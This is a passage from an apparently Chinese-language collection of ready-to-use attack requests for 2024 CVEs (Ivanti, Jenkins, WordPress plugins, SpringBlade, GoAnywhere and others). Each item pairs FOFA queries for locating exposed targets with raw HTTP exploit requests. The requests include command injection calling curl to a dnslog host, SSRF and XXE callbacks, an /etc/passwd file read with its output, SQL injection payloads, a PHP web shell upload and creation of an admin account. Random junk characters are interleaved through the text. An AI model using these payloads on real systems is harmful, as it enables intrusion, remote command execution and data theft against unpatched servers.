Content-Length: 121* N+ L& S, `+ W8 x, c9 {' V; V8 p3 K
Accept: */*
5 H# S7 t D1 m# I6 x2 g8 f/ {Accept-Encoding: gzip, deflate6 F+ f6 `% q( u% I3 T7 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 G+ l, z8 ]9 s9 G* rContent-Type: application/x-www-form-urlencoded; charset=UTF-82 i3 ]7 W6 _" I9 H7 J7 r
X-Requested-With: XMLHttpRequest
0 K) ^/ M# M% F" i7 I# M1 [1 y x* l1 E3 Z9 I! k
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
+ s2 r/ A9 e' p
# e" y* G8 D+ i! _! Z( @3 X) d5 h" i- d! i L& ~: M: ?
99. Ncast盈可视高清智能录播系统busiFacade RCE$ h- W3 _2 g3 A* @6 f. Z! ]1 g
CVE-2024-03052 n6 S( D. v: N' h8 N1 V
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
+ f, w5 o f8 k9 J% PPOST /classes/common/busiFacade.php HTTP/1.1& U" l! q6 M1 x& ~' C$ }( @, |! t
Host: 192.168.40.130:8080
9 t; |7 L" e8 m. A- ?. rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* @8 f+ k1 B1 f7 t
Connection: close/ r- w9 f. K9 j
Content-Length: 154: S7 V" O6 }; W
Accept: */*
1 X3 v) e- u2 Y) [Accept-Encoding: gzip, deflate: B/ |* z+ O3 X3 k( h2 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 K% H- f. @4 v* Y) U. B
Content-Type: application/x-www-form-urlencoded; charset=UTF-86 j+ v+ E& ^2 b2 \4 k7 O
X-Requested-With: XMLHttpRequest' f8 Y; ?( n' i- `8 B) e. H
3 U B2 ~9 z1 q# y; t
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
& |% t* [. q( g* q- |
5 ?0 M4 D4 H i0 u7 E- M" s" N: B
9 K$ C9 S8 ]' k1 N, Y. B7 G. ~7 y100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传9 ?( O/ M4 a0 h5 P- ]& a, j! C
CVE-2024-0352
/ B* _. m' s" M8 D i$ o/ jFOFA:icon_hash="874152924"/ x9 H- {! M% @) A$ N) @7 c
POST /api/file/formimage HTTP/1.10 m) ~7 O3 X* W4 w' g
Host: 192.168.40.1301 \9 e& g& u5 \8 Z0 u
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
$ E+ ?" g3 w+ P! T& A, m2 RConnection: close0 I" T/ Z1 J5 f9 f0 m
Content-Length: 201
; z: v7 \5 _: B5 `4 [4 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei: H0 j; u/ w, w- D
Accept-Encoding: gzip
, _+ K: w& X+ {$ k- o' z: a' Y3 }: Q" T1 K0 s
------WebKitFormBoundarygcflwtei
; Y! l* b4 r' B9 T5 ` {Content-Disposition: form-data; name="file";filename="IE4MGP.php"
3 B; q" ]) {6 F! i6 j: B* cContent-Type: application/x-php- h$ Z4 \# b5 p) ?
. t; a, Y3 e Y0 X+ P$ d7 q4 R2ayyhRXiAsKXL8olvF5s4qqyI2O. a# n |9 Y8 T; Y/ l' k* `* J
------WebKitFormBoundarygcflwtei--
9 i: D4 d$ k# m7 h2 I
9 p. M3 f, J/ \
h; I# b* f! @1 H0 R$ C) @8 t a101. ivanti policy secure-22.6命令注入 i; `6 }! Y# B
CVE-2024-21887
) Y. k- H2 z3 u1 L; f9 qFOFA:body="welcome.cgi?p=logo"
$ q2 b: y! t" f" V) z+ X, iGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1; Z* z! Z' V5 k
Host: x.x.x.xx.x.x.x
6 X5 }: x, a( v# P0 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, `1 u' e+ {0 D& y: p$ ]
Connection: close
. g. U' `* q3 c& j# \Accept-Encoding: gzip
' i+ T% N! W) ?
$ G$ T) f Y& [4 o: X6 J
5 m! z$ e- A* @. \2 `- s z102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行+ ]! c/ ]) V( a* Q
CVE-2024-218934 f S+ O; a4 {
FOFA:body="welcome.cgi?p=logo"
& \, o+ g6 d6 P& T9 r XPOST /dana-ws/saml20.ws HTTP/1.1 R T0 h$ R! x& Y' l& s
Host: x.x.x.x3 L! v# F* W ?) K- G4 c( @5 t5 Y+ \3 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ }6 g0 ?( \! q& F2 ^5 A
Connection: close
2 @& U( `4 B7 ]2 H* B- R( t) `Content-Length: 792
/ ~: U/ \7 N, u. r# m/ [6 U: d2 \2 K/ iAccept-Encoding: gzip9 V) X3 Q9 o1 Y! N/ Q
4 E" O- D( P$ w6 B2 @. N
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
% V2 {3 i# W# g
5 j( S* i( ^5 Z9 l! R0 W w3 p103. Ivanti Pulse Connect Secure VPN XXE% n5 ]* ~, _/ ]. `0 B& L
CVE-2024-22024
; `, K7 } f' ? B2 nFOFA:body="welcome.cgi?p=logo"
: l8 A( z4 p7 Y/ |POST /dana-na/auth/saml-sso.cgi HTTP/1.1# f x1 d& P2 }' @+ X
Host: 192.168.40.130:111! F) S& R; w7 L/ j: n
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- h7 f: U; S8 Z1 V
Connection: close9 \1 Z. F* D; z- d9 O
Content-Length: 204
' N4 ? Y( r/ r1 S! V# t n$ DContent-Type: application/x-www-form-urlencoded _& i& `5 {0 q) B
Accept-Encoding: gzip
5 ], l: B/ C$ K9 X
: \: I7 M+ b$ h+ N' } bSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==2 z8 R W' e/ y; F( K3 p }7 E
0 L5 `, _; P2 V, y7 f5 Z
/ r0 f, M' W9 Z7 j9 {$ Z% N4 a
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
8 f$ k" c1 a& F! q6 N<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
7 r1 {& C2 ~! D6 ?( r+ e! v4 L5 G, X8 J- p7 T6 B
. X2 G! Z: m2 K5 l! j
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露5 q) W8 H9 U$ n4 C9 K
CVE-2024-05693 @% h7 Y9 c0 u' G0 f# V
FOFA:title="TOTOLINK"
( [8 _$ O$ P2 K( p d* ?4 iPOST /cgi-bin/cstecgi.cgi HTTP/1.1 \# B2 {0 w$ z$ J# V. A
Host:192.168.0.1
. Z7 ?& B. D3 J; [0 Z8 f3 pContent-Length:41
6 y9 N. K) o6 ^/ oAccept:application/json,text/javascript,*/*;q=0.01
5 N) ^, e" I7 z8 T' B$ wX-Requested-with: XMLHttpRequest8 B" Z8 U% @; d, y$ }& E
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
: u3 ]/ \% Q9 tContent-Type: application/x-www-form-urlencoded:charset=UTF-8
, g. O0 B5 X, i, E. GOrigin: http://192.168.0.1
" c' |% j6 U9 H" ~" xReferer: http://192.168.0.1/advance/index.html?time=1671152380564
/ w6 O+ m0 v# D- _0 O3 l' vAccept-Encoding:gzip,deflate
4 M4 k7 I$ B$ ~ }7 ]0 pAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7; b- c0 Z8 g- z6 r
Connection:close
* o' l" m, {; `; H1 L0 Z& d
+ }4 J7 u, D. C) H. d{
' _$ i1 Y6 t5 t"topicurl":"getSysStatusCfg",; K1 D( t4 _2 @9 e$ D8 c
"token":""
{$ O* a9 m8 X2 ~5 A2 D}
9 q6 `4 }: Z& ]+ }3 Q. u3 N4 ?, {* B7 L% b2 m; ~
105. SpringBlade v3.2.0 export-user SQL 注入* A" {- x" }0 c; Z8 K5 \
FOFA:body="https://bladex.vip"
( q% j2 S9 H0 _- y' Khttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1/ _- }/ b2 ?) S% K
% o0 N: U) |# e3 g" S106. SpringBlade dict-biz/list SQL 注入
A& U4 E) z* M- lFOFA:body="Saber 将不能正常工作"& B; J N' C8 q/ k
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1: O/ U% h. ]9 o. t& Q- Q- l+ q
Host: your-ip* Q% D5 Z2 B6 ]& Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 i1 Y+ `) Y$ j
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A4 {2 a' j- n" m8 _; ]2 f6 I' _
Accept-Encoding: gzip, deflate( j) f% A% B# x S4 C$ X# R7 }
Accept-Language: zh-CN,zh;q=0.9# s5 `9 Y7 q$ i9 k z; e7 }- x
Connection: close
6 P5 I" r" [4 w. \& f' B7 h8 Z9 P& o$ E& S8 H7 [
$ J* Q. [' d3 O- K e
107. SpringBlade tenant/list SQL 注入
, L: ~* o# \2 H3 x4 R3 mFOFA:body="https://bladex.vip"6 v- Z/ {$ p" p, u P4 q
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1. z) v) \; W. w& m* _
Host: your-ip |; M4 p, T( W Q& L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 P7 _ J9 V5 W
Blade-Auth:替换为自己的3 t( A* H. q4 `
Connection: close
( F0 t' ~' i8 r; V) E ~1 v2 G& V/ x* q0 C% G
0 T& p2 O9 H' u" t& r& L# `/ E0 l- h( b. ]9 q& y8 V0 C' D
108. D-Tale 3.9.0 SSRF
* F- g! t. k# W) I8 WCVE-2024-21642: T0 k0 i+ s# j9 {5 N Z
FOFA:"dtale/static/images/favicon.png": T% ?( k8 E% I( f0 E
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1/ Q3 K" @$ A( [3 e( d* @
Host: your-ip
1 X% P$ }5 m: a. s4 i+ c) q$ OAccept: application/json, text/plain, */*
/ F* }% h% t4 `* ]" y; m UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: B1 D4 O: c, w# F( z
Accept-Encoding: gzip, deflate7 w4 {# Y2 ~+ o% K' O
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: v! w* u; }. q, ^
Connection: close
p- {; w8 h3 j! P0 B; d' G/ L9 z" r4 ?
" o. B6 s, a* J3 `! {5 C
109. Jenkins CLI 任意文件读取1 X% B( P% I) W/ ?" T
CVE-2024-23897* z9 y* [% n; N/ t$ `$ Q
FOFA:header="X-Jenkins"* Y7 @) r) r8 @
POST /cli?remoting=false HTTP/1.1
/ X) c. j$ y' }9 fHost:
7 s$ |- G1 N# E* \) s! d6 W8 EContent-type: application/octet-stream. E0 y0 |4 d, L: H7 Y
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
8 S) h9 ?0 {7 t; J v% x/ }! OSide: upload- ^1 z+ m, P1 C# g+ q2 `% x. Q
Connection: keep-alive
- I1 R2 I! S8 T" K9 K7 |Content-Length: 163
2 d% L, A' Z5 C) V( X5 Q- E; r1 r) S
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'5 J* x$ ^: ~* b c& {
; }9 Q6 r4 L. ^; a4 h
$ f# g1 y7 M9 {( mPOST /cli?remoting=false HTTP/1.1
! Z. l' k8 k4 E7 t2 |4 }Host:
+ c+ W: b4 R$ l' I; k, z0 ZSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e928 m$ {- {# B$ g: f, b; @7 k6 i
download
5 m, D0 P+ z- Y8 OContent-Type: application/x-www-form-urlencoded
' ], l5 d+ `1 {7 f) Q% ?! J3 KContent-Length: 0
$ w5 d. b3 T; C+ I1 m' G( K" ^1 t& C$ w# P! E# ^
- y1 H7 n& o' _; `
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin, G1 a0 h9 J5 L0 J4 t
java -jar jenkins-cli.jar help3 q, K/ {( d" z; P7 m" `) R8 Z
[COMMAND]
& D- E8 o) t6 I. H5 S" g; C& MLists all the available commands or a detailed description of single command.4 m- M# u# l$ N, J
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
2 R4 C4 x, ~0 E3 E& R& P; e3 ` Y- \! N
! [4 B$ h" U( q9 h) v110. Goanywhere MFT 未授权创建管理员
0 R" M X3 B, ~/ d- `$ DCVE-2024-0204
. ^: U6 \# x$ \0 c* i/ t: x8 uFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
s, }4 `5 Y! P& Q, cGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
- x) k( c, m; w/ P) {; i# v% qHost: 192.168.40.130:80000 {$ J$ h% f1 ^6 }/ U# |3 G
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36& l6 e, n C# C% p1 T" V% F
Connection: close1 x1 m% ~( k" v' w- a0 T
Accept: */*% ]9 H' d4 p& |* c
Accept-Language: en
" L1 |* z; A W$ U2 j' ^1 mAccept-Encoding: gzip
0 u( m7 v1 x; l* U @# P) D8 {1 B
# Q* l# D' _0 I7 n
+ C, b/ c- i5 U1 P111. WordPress Plugin HTML5 Video Player SQL注入
" K% W' ~0 a! C- Y! D3 f) ~CVE-2024-1061
( T; D; T. ?4 t( ~FOFA:"wordpress" && body="html5-video-player", ?3 y! [; X8 e& u3 @4 J* b3 P
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
5 q' e+ q6 W$ P, c* n7 @ l; H% GHost: 192.168.40.130:112
6 r" ?) D& {& z6 ?5 c t- G! \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
$ `8 u* A2 y; F2 n O( RConnection: close
: F. n q1 U- Z, N# S f7 t: fAccept: */*& {4 w$ s4 O" g. e, R
Accept-Language: en/ s+ p: O5 `( M) X
Accept-Encoding: gzip J, @0 C( X& j# U+ i2 O
; r: t6 g) L2 r9 z% K
$ w7 `+ Q' T5 c* y" Q3 ^6 d112. WordPress Plugin NotificationX SQL 注入1 o3 j3 |' s- X9 x- d. X4 ^
CVE-2024-16988 G% u9 }1 @0 \2 D9 S
FOFA:body="/wp-content/plugins/notificationx"5 c5 |* n# s/ ^
POST /wp-json/notificationx/v1/analytics HTTP/1.1" _- u. W- Z) V& k+ G& S3 l e
Host: {{Hostname}}. P! ]- ]- s, v$ _ b! G, h" B
Content-Type: application/json+ U: a' i0 B6 V4 j! c
; Z$ x$ p! ]8 t. E, w5 k{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}9 j+ K3 x# N' Y) [/ s- a5 C- I+ l9 y
2 a1 }+ X7 L) D4 i" @# k
; @/ M% n; P4 _+ z* W" z9 O113. WordPress Automatic 插件任意文件下载和SSRF
/ D; h K7 K8 z* DCVE-2024-27954
8 w: D: U5 g$ `/ K5 c6 T" G9 hFOFA:"/wp-content/plugins/wp-automatic"
* s' K& b$ R+ e4 }4 _0 k- p9 OGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
) z& r. [8 {: k7 i( YHost: x.x.x.x
' M [6 I+ e# ^0 U U) `User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
3 D" B" @4 ]( hConnection: close4 M1 H- } r! u9 h
Accept: */*
2 R1 \- s+ W/ }6 ^' Q( lAccept-Language: en: |8 c0 }: p8 K" D& s
Accept-Encoding: gzip
9 F9 |) i( e: r. \2 O+ C4 R
' T! q7 O9 c6 B" T! h& ^: C. h2 @- ~! _2 l/ v* Q! ^; A
114. WordPress MasterStudy LMS插件 SQL注入
* L8 ~ j7 A/ b) _) K( g/ L( ^FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"# S0 Y) R; d7 C+ s
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.18 a9 o3 M: O2 F1 Y
Host: your-ip8 V& o. h" t/ A, b# E
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
7 h' [& u$ v1 n* a: P) _1 c8 e7 j. hAccept-Charset: utf-8
* Z2 @0 z, u2 TAccept-Encoding: gzip, deflate n B0 @+ m! p8 v
Connection: close
5 P; b0 H* M4 W& ^% d+ q% t, u
+ D3 l( A7 p/ p8 T% C
- B) B- D5 o) W7 v115. WordPress Bricks Builder <= 1.9.6 RCE, w K/ h9 K6 \9 n
CVE-2024-25600) i. u7 J7 J! l. |/ {
FOFA: body="/wp-content/themes/bricks/"
$ N/ i8 V: ]9 J6 S% ?1 v$ i1 H第一步,获取网站的nonce值
4 d. N6 B& U0 \# C1 \4 q! C. kGET / HTTP/1.1, H. h/ V y* a. E) [ T
Host: x.x.x.x1 }4 T6 ~! d# D. h; }
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" T/ }% `7 @0 Q: N
Connection: close
1 O# w+ ]! t( N. }Accept-Encoding: gzip3 P4 m; Q+ q8 H
* I+ @4 l: [# D' u9 R' Z7 N, W( U" w( Y3 k, _
第二步替换nonce值,执行命令% E1 l0 d+ b& D; V" q
POST /wp-json/bricks/v1/render_element HTTP/1.1) z8 ] x* u2 s
Host: x.x.x.x
) \- _# z$ F f3 O( `5 T& h9 P5 @9 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' G+ y! o D7 u6 D0 hConnection: close7 y( }) ^( g/ B# \ z& e
Content-Length: 356* x* `& J" V. h1 r- v+ H6 I
Content-Type: application/json& h5 @8 d+ d9 t% k6 e2 ~
Accept-Encoding: gzip
9 ?& j x* M' w- I3 M
+ m1 y R: R% f7 n! `/ R5 F{
2 H M0 E6 n+ A/ E8 q/ m7 Z& r"postId": "1",0 ]. U6 `( a$ z" n/ {
"nonce": "第一步获得的值",3 J2 W4 _, L; m- y$ X6 m1 K- Q
"element": {
) @- Y, n8 B+ }( v4 ] "name": "container", x/ r3 X; t- ] I
"settings": {1 N q# I8 ^) o9 T9 _1 j! ^8 A
"hasLoop": "true"," M4 h! [5 m7 l5 S( c& @
"query": {* y: y* Q* {7 A: Y0 K! f" X% m& Y
"useQueryEditor": true,* X& a" E" x ]6 n0 o5 j/ F
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
9 Q- @+ w4 l1 n) U3 H) h5 K "objectType": "post"
$ y p) t, Z; S; C5 e }
( N, ^! o' t1 M7 r }: }% B4 V/ U0 B0 Q2 T9 {
}5 w( V/ r; `% A
}
3 a+ _ w. s k( F4 d- s, J+ g: P. P+ R0 \0 F1 d- D" ?! R% N5 Q* D
6 S: w1 T: q0 F$ a6 [
116. wordpress js-support-ticket文件上传+ q9 P; S2 P% S0 E4 r8 q; [
FOFA:body="wp-content/plugins/js-support-ticket"
+ c; ?$ p% _* wPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.14 S, ~# W" H+ {/ k
Host:) j* E+ S# w o4 h: x& |4 x
Content-Type: multipart/form-data; boundary=--------767099171
1 A X5 _* ]/ g& W! B; [User-Agent: Mozilla/5.0
2 Q8 a. u/ k O. v* X! q" m0 { h/ A! }; Z2 [7 I" ?+ U8 q/ Z
----------767099171: `* e( Y% U; `
Content-Disposition: form-data; name="action"
" T5 p! s% ~; u Fconfiguration_saveconfiguration
; f2 L6 a3 t ]( F8 g5 E" J( `! U----------767099171; A% @- W/ k0 ~3 x- _
Content-Disposition: form-data; name="form_request"6 [; |' q- j) _- \
jssupportticket
7 s6 z9 O$ n- Z, w----------767099171" X7 V6 B: ]& o! v7 y
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
) i! t5 h* G- _" {$ QContent-Type: image/png* w5 C, U% c1 J5 Z7 g# ~- Q# |
----------767099171--
6 }% N' V8 ]# k1 B" T7 w7 t' X/ }, Z; H6 t' F+ M5 V
7 b. ?% Q r7 X117. WordPress LayerSlider插件SQL注入
" y) c" x1 J5 W6 b9 n! K3 H# f xversion:7.9.11 – 7.10.0
- w1 L- B# B1 `; h! LFOFA:body="/wp-content/plugins/LayerSlider/"- f3 F# S& Q. g
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
+ {8 _# q2 Q7 V. `5 p0 dHost: your-ip
" t3 {3 S8 H- c! |5 O0 L7 y$ z/ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 G k; a& b6 e: `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 N/ q A% b6 ?) k' x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. D; M+ u7 a( R- P$ O8 e, J l
Accept-Encoding: gzip, deflate, br
' t- K! K; I& NConnection: close4 ~& t( g7 L9 ?# ~$ }- c7 [/ k% I
Upgrade-Insecure-Requests: 1
- W5 I/ \1 O ]! ?5 q, q' D; ? Y6 v6 d" K$ P
2 |0 D' _1 }+ Q2 e118. 北京百绰智能S210管理平台uploadfile.php任意文件上传- _2 A& ]5 a' n& F$ j# p5 [, l
CVE-2024-09392 j# q4 r( ]" S1 {3 P1 M
FOFA:title="Smart管理平台"0 A5 B) q2 a8 f6 h9 w
POST /Tool/uploadfile.php? HTTP/1.1# R* q3 j# x' J6 e5 e
Host: 192.168.40.130:8443
& S" r V* r7 T) P1 z0 hCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
" ~) T) D& A. ]8 f- @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
- T, j7 y3 b4 c5 B4 B: N9 W; MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 E4 |" J+ |: i+ JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# ^, V. F% N- z* N& _1 D/ a; ^Accept-Encoding: gzip, deflate5 J9 v& [, e% D' v5 p2 Y% [
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
( b! Q- c3 i+ X$ i9 |: xContent-Length: 405
- F! e% T8 U u2 ~" TOrigin: https://192.168.40.130:8443, m/ O& l/ K) i; l2 V
Referer: https://192.168.40.130:8443/Tool/uploadfile.php5 k/ \ {: Z4 a. [, o% [! f
Upgrade-Insecure-Requests: 17 R' e4 S# b! j. _% A7 M, ^" V1 c
Sec-Fetch-Dest: document
$ l$ D. l8 M0 m, jSec-Fetch-Mode: navigate, [( ~' z) u) k% h5 ?3 N3 [
Sec-Fetch-Site: same-origin
- n a y$ ~" ~7 a C) J) O' l. K/ N ~# MSec-Fetch-User: ?1
, [( y* f! _7 M) }8 o' y9 Q, gTe: trailers
! j% a% Z+ W* G% WConnection: close
- I R! n4 T: }6 f& O* C4 b: S' g2 q: E, f: Q
-----------------------------13979701222747646634037182887
% e3 {9 d6 X- [- o/ XContent-Disposition: form-data; name="file_upload"; filename="contents.php"
$ Z+ `! r. ^1 w/ D+ aContent-Type: application/octet-stream! {. O& k2 L* J; ]) ]( e
# ]8 e; X9 g6 v# G2 D. E
<?php! y8 D4 O( r4 o( |- F, @
system($_POST["passwd"]);+ Z9 g4 S8 b0 k7 L' z( {
?>1 b0 x$ ]: }! [4 f
-----------------------------13979701222747646634037182887: F$ S! t- W5 c5 V' E
Content-Disposition: form-data; name="txt_path"
8 n& h6 m2 W2 g* k5 R) Q$ h( s1 q
6 u3 M6 f- v$ V ]. c: Z' i6 b% l/home/src.php8 Y, J# K2 l8 r( Z/ k
-----------------------------13979701222747646634037182887--
' @( `) g3 Q o/ n
7 l' C4 H% e- ?3 u. q" n# Q8 C& C, [; K3 C* \" y
访问/home/src.php1 [. {) ]! \$ ?( @2 B; u
' l1 n; n$ `( C' W
119. 北京百绰智能S20后台sysmanageajax.php sql注入1 A4 x$ u9 q0 V* O! { a3 T( I
CVE-2024-1254- u; a$ A- B$ e# V2 C
FOFA:title="Smart管理平台"0 _' ~8 i m. Y" r2 S; V
先登录进入系统,默认账号密码为admin/admin
" |/ K* |; w+ x6 w- mPOST /sysmanage/sysmanageajax.php HTTP/1.11
* [* |7 d8 s' i" Z h6 F/ qHost: x.x.x.x
4 s, y3 u, ` q4 ~Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
# r# o' |5 V6 N2 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.06 B$ J5 O2 b- {3 q
Accept: */*
4 ^5 u& E8 |( A+ C7 G" q6 ]1 gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; z `5 ?( Q$ n2 w( h+ g0 M$ R
Accept-Encoding: gzip, deflate1 f' o# O6 {8 m
Content-Type: application/x-www-form-urlencoded;
% Z) d: G% u" w* y5 ~2 i( [Content-Length: 109
. N0 V; F$ y' MOrigin: https://58.18.133.60:8443
% X" ?$ B9 R! A2 P/ mReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php& @4 o6 a% M3 v: m+ k
Sec-Fetch-Dest: empty3 A( n& z4 ~5 _ G( b
Sec-Fetch-Mode: cors
' v2 \. G5 l5 R3 B% E! TSec-Fetch-Site: same-origin( |& O4 ~9 H6 k) J
